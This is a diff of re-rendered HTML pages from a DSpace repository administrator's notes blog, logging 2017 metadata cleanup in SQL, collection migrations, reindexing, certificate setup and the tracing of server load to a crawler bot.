<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
DELETE 207
</code></pre><ul>
<li>When we discussed this in late July there were some other renames they had requested, but I don&rsquo;t see them in the current spreadsheet so I will have to follow that up</li>
<li>I talked to Macaroni Bros and they said to just go ahead with the other corrections as well, as their spreadsheet had evolved organically rather than systematically!</li>
<li>The final list of corrections and deletes should therefore be:</li>
</ul>
<pre><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
</code></pre><ul>
<li>Create and merge pull request to shut up the Ehcache update check (<a href="https://github.com/ilri/DSpace/pull/337">#337</a>)</li>
<li>Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): <a href="https://jira.duraspace.org/browse/DS-1492">https://jira.duraspace.org/browse/DS-1492</a></li>
@ -332,7 +332,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
<li>Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database</li>
<li>Here are all my distinct authority combinations in the database before:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -347,7 +347,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>And then after adding a new item and selecting an existing &ldquo;Orth, Alan&rdquo; with an ORCID in the author lookup:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -363,7 +363,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>It created a new authority&hellip; let&rsquo;s try to add another item and select the same existing author and see what happens in the database:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -379,7 +379,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>No new one&hellip; so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -396,7 +396,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>Shit, it created another authority! Let&rsquo;s try it again!</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -427,7 +427,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
<ul>
<li>Apply CCAFS project tag corrections on CGSpace:</li>
</ul>
<pre><code>dspace=# \i /tmp/ccafs-projects.sql
<pre tabindex="0"><code>dspace=# \i /tmp/ccafs-projects.sql
DELETE 5
UPDATE 4
UPDATE 1
@ -439,26 +439,26 @@ DELETE 207
<li>We still need to do the changes to <code>config.dct</code> and regenerate the <code>sitebndl.zip</code> to send to the Handle.net admins</li>
<li>According to this <a href="http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html">dspace-tech mailing list entry from 2011</a>, we need to add the extra handle prefixes to <code>config.dct</code> like this:</li>
</ul>
<pre><code>&quot;server_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
<pre tabindex="0"><code>&#34;server_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;replication_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;replication_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;backup_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;backup_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
</code></pre><ul>
<li>More work on the CGIAR Library migration test run locally, as I was having problems importing the last fourteen items from the CGIAR System Management Office community</li>
<li>The problem was that we remapped the items to new collections after the initial import, so the items were using the 10947 prefix but the community and collection were using 10568</li>
<li>I ended up having to read the <a href="https://wiki.lyrasis.org/display/DSDOC5x/AIP+Backup+and+Restore#AIPBackupandRestore-ForceReplaceMode">AIP Backup and Restore</a> documentation closely a few times and then explicitly preserve handles and ignore parents:</li>
</ul>
<pre><code>$ for item in 10568-93759/ITEM@10947-46*; do ~/dspace/bin/dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/87738 $item; done
<pre tabindex="0"><code>$ for item in 10568-93759/ITEM@10947-46*; do ~/dspace/bin/dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/87738 $item; done
</code></pre><ul>
<li>Also, this was in replace mode (-r) rather than submit mode (-s), because submit mode always generated a new handle even if I told it not to!</li>
<li>I decided to start the import process in the evening rather than waiting for the morning, and right as the first community was finished importing I started seeing <code>Timeout waiting for idle object</code> errors</li>
@ -478,7 +478,7 @@ DELETE 207
<ul>
<li>Nightly Solr indexing is working again, and it appears to be pretty quick actually:</li>
</ul>
<pre><code>2017-09-19 00:00:14,953 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (0 of 65808): 17607
<pre tabindex="0"><code>2017-09-19 00:00:14,953 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (0 of 65808): 17607
...
2017-09-19 00:04:18,017 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (65807 of 65808): 83753
</code></pre><ul>
@ -494,7 +494,7 @@ DELETE 207
<li>Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite</li>
<li>Force thumbnail regeneration for the CGIAR System Organization&rsquo;s Historic Archive community (2000 items):</li>
</ul>
<pre><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &#34;ImageMagick PDF Thumbnail&#34;
</code></pre><ul>
<li>I&rsquo;m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org</li>
</ul>
@ -540,7 +540,7 @@ DELETE 207
<li>Turns out he had already mapped some, but requested that I finish the rest</li>
<li>With this GREL in OpenRefine I can find items that are mapped, i.e. they have <code>10568/3||</code> or <code>10568/3$</code> in their <code>collection</code> field:</li>
</ul>
<pre><code>isNotNull(value.match(/.+?10568\/3(\|\|.+|$)/))
<pre tabindex="0"><code>isNotNull(value.match(/.+?10568\/3(\|\|.+|$)/))
</code></pre><ul>
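<li>A rough command line equivalent on the exported CSV (hypothetical file name, and assuming csvkit is installed and the column is named <code>collection</code>) would be:</li>
</ul>
<pre><code>$ csvcut -c collection /tmp/ilri-archive.csv | grep -E '10568/3(\|\||$)'
</code></pre><ul>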
<li>Peter also made a lot of changes to the data in the Archives collections while I was attempting to import the changes, so we were essentially competing for PostgreSQL and Solr connections</li>
<li>I ended up having to kill the import and wait until he was done</li>
@ -552,7 +552,7 @@ DELETE 207
<li>Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org</li>
<li>Peter wants me to clean up the text values for Delia Grace&rsquo;s metadata, as the authorities are all messed up again since we cleaned them up in <a href="/cgspace-notes/2016-12">2016-12</a>:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Grace, Delia | | 600
@ -563,12 +563,12 @@ DELETE 207
<li>Strangely, none of her authority entries have ORCIDs anymore&hellip;</li>
<li>I&rsquo;ll just fix the text values and forget about it for now:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 610
</code></pre><ul>
<li>After this we have to reindex the Discovery and Authority cores (as <code>tomcat7</code> user):</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 83m56.895s
@ -603,7 +603,7 @@ sys 0m12.113s
<li>The <code>index-authority</code> script always seems to fail, I think it&rsquo;s the same old bug</li>
<li>Something interesting for my notes about JNDI database pool—since I couldn&rsquo;t determine if it was working or not when I tried it locally the other day—is this error message that I just saw in the DSpace logs today:</li>
</ul>
<pre><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspaceLocal
<pre tabindex="0"><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspaceLocal
...
INFO org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspaceLocal
INFO org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
@ -627,13 +627,13 @@ INFO org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Da
<li>Now the redirects work</li>
<li>I quickly registered a Let&rsquo;s Encrypt certificate for the domain:</li>
</ul>
<pre><code># systemctl stop nginx
<pre tabindex="0"><code># systemctl stop nginx
# /opt/certbot-auto certonly --standalone --email aorth@mjanja.ch -d library.cgiar.org
# systemctl start nginx
</code></pre><ul>
<li>I modified the nginx configuration of the ansible playbooks to use this new certificate and now the certificate is enabled and OCSP stapling is working:</li>
</ul>
<pre><code>$ openssl s_client -connect cgspace.cgiar.org:443 -servername library.cgiar.org -tls1_2 -tlsextdebug -status
<pre tabindex="0"><code>$ openssl s_client -connect cgspace.cgiar.org:443 -servername library.cgiar.org -tls1_2 -tlsextdebug -status
...
OCSP Response Data:
...
@ -659,15 +659,15 @@ Cert Status: good
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -115,7 +115,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<p class="blog-post-meta">
<time datetime="2017-10-01T08:07:54+03:00">Sun Oct 01, 2017</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -124,7 +124,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<ul>
<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li>
</ul>
<pre><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
</code></pre><ul>
<li>There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li>
<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li>
@ -134,13 +134,13 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Peter Ballantyne said he was having problems logging into CGSpace with &ldquo;both&rdquo; of his accounts (CGIAR LDAP and personal, apparently)</li>
<li>I looked in the logs and saw some LDAP lookup failures due to timeout but also strangely a &ldquo;no DN found&rdquo; error:</li>
</ul>
<pre><code>2017-10-01 20:24:57,928 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:ldap_attribute_lookup:type=failed_search javax.naming.CommunicationException\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is java.net.ConnectException\colon; Connection timed out (Connection timed out)]
<pre tabindex="0"><code>2017-10-01 20:24:57,928 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:ldap_attribute_lookup:type=failed_search javax.naming.CommunicationException\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is java.net.ConnectException\colon; Connection timed out (Connection timed out)]
2017-10-01 20:22:37,982 INFO org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:failed_login:no DN found for user pballantyne
</code></pre><ul>
<li>I thought maybe his account had expired (seeing as it was the first of the month) but he says he was finally able to log in today</li>
<li>The logs for yesterday show fourteen errors related to LDAP auth failures:</li>
</ul>
<pre><code>$ grep -c &quot;ldap_authentication:type=failed_auth&quot; dspace.log.2017-10-01
<pre tabindex="0"><code>$ grep -c &#34;ldap_authentication:type=failed_auth&#34; dspace.log.2017-10-01
14
</code></pre><ul>
<li>For what it&rsquo;s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET&rsquo;s LDAP server</li>
@ -152,7 +152,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Communicate with Sam from the CGIAR System Organization about some broken links coming from their CGIAR Library domain to CGSpace</li>
<li>The first is a link to a browse page that should be handled better in nginx:</li>
</ul>
<pre><code>http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject → https://cgspace.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject
<pre tabindex="0"><code>http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject → https://cgspace.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject
</code></pre><ul>
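<li>One way to see how that URL is currently being answered (a quick sketch) is to check the status code and any redirect target with curl:</li>
</ul>
<pre><code>$ curl -s -o /dev/null -w '%{http_code} %{redirect_url}\n' 'http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject'
</code></pre><ul>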
<li>We&rsquo;ll need to check for browse links and handle them properly, including swapping the <code>subject</code> parameter for <code>systemsubject</code> (which doesn&rsquo;t exist in Discovery yet, but we&rsquo;ll need to add it) as we have moved their poorly curated subjects from <code>dc.subject</code> to <code>cg.subject.system</code></li>
<li>The second link was a direct link to a bitstream which has broken due to the sequence being updated, so I told him he should link to the handle of the item instead</li>
@ -165,7 +165,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Twice in the past twenty-four hours Linode has warned that CGSpace&rsquo;s outbound traffic rate was exceeding the notification threshold</li>
<li>I had a look at yesterday&rsquo;s OAI and REST logs in <code>/var/log/nginx</code> but didn&rsquo;t see anything unusual:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
141 157.55.39.240
145 40.77.167.85
162 66.249.66.92
@ -176,7 +176,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
1495 50.116.102.77
3904 70.32.83.92
9904 45.5.184.196
# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
# awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
5 66.249.66.71
6 66.249.66.67
6 68.180.229.31
@ -225,7 +225,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Delete Community 10568/102 (ILRI Research and Development Issues)</li>
<li>Move five collections to 10568/27629 (ILRI Projects) using <code>move-collections.sh</code> with the following configuration:</li>
</ul>
<pre><code>10568/1637 10568/174 10568/27629
<pre tabindex="0"><code>10568/1637 10568/174 10568/27629
10568/1642 10568/174 10568/27629
10568/1614 10568/174 10568/27629
10568/75561 10568/150 10568/27629
@ -270,14 +270,14 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again</li>
<li>Still not sure where the load is coming from right now, but it&rsquo;s clear why there were so many alerts yesterday on the 25th!</li>
</ul>
<pre><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-25 | sort -n | uniq | wc -l
18022
</code></pre><ul>
<li>Compared to other days there were two or three times the number of requests yesterday!</li>
</ul>
<pre><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-23 | sort -n | uniq | wc -l
3141
# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-26 | sort -n | uniq | wc -l
7851
</code></pre><ul>
<li>I still have no idea what was causing the load to go up today</li>
@ -302,7 +302,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I&rsquo;m still not sure why this started causing alerts so repeatedly this past week</li>
<li>I don&rsquo;t see any telltale signs in the REST or OAI logs, so trying to do rudimentary analysis in the DSpace logs:</li>
</ul>
<pre><code># grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#39;2017-10-29 02:&#39; dspace.log.2017-10-29 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2049
</code></pre><ul>
<li>So there were 2049 unique sessions during the hour of 2AM</li>
@ -310,7 +310,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I think I&rsquo;ll need to enable access logging in nginx to figure out what&rsquo;s going on</li>
<li>After enabling logging on requests to XMLUI on <code>/</code> I see some new bot I&rsquo;ve never seen before:</li>
</ul>
<pre><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &quot;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&quot; 200 7776 &quot;-&quot; &quot;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&quot;
<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &#34;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&#34; 200 7776 &#34;-&#34; &#34;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&#34;
</code></pre><ul>
<li>CORE seems to be some bot that is &ldquo;Aggregating the world&rsquo;s open access research papers&rdquo;</li>
<li>The contact address listed in their bot&rsquo;s user agent is incorrect; the correct page is simply: <a href="https://core.ac.uk/contact">https://core.ac.uk/contact</a></li>
@ -323,39 +323,39 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Like clockwork, Linode alerted about high CPU usage on CGSpace again this morning (this time at 8:13 AM)</li>
<li>Uptime Robot noticed that CGSpace went down around 10:15 AM, and I saw that there were 93 PostgreSQL connections:</li>
</ul>
<pre><code>dspace=# SELECT * FROM pg_stat_activity;
<pre tabindex="0"><code>dspace=# SELECT * FROM pg_stat_activity;
...
(93 rows)
</code></pre><ul>
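<li>To see at a glance what those connections are doing, something like this (a sketch; connection parameters are assumed) groups them by state:</li>
</ul>
<pre><code>$ psql -U dspace dspace -c 'SELECT state, count(*) FROM pg_stat_activity GROUP BY state ORDER BY 2 DESC;'
</code></pre><ul>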
<li>Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:</li>
</ul>
<pre><code># grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log
26475
# grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log.1
# grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log.1
135083
</code></pre><ul>
<li>IP addresses for this bot currently seem to be:</li>
</ul>
<pre><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq
137.108.70.6
137.108.70.7
</code></pre><ul>
<li>I will add their user agent to the Tomcat Session Crawler Valve but it won&rsquo;t help much because they are only using two sessions:</li>
</ul>
<pre><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq
session_id=5771742CABA3D0780860B8DA81E0551B
session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
</code></pre><ul>
<li>&hellip; and most of their requests are for dynamic discover pages:</li>
</ul>
<pre><code># grep -c 137.108.70 /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c 137.108.70 /var/log/nginx/access.log
26622
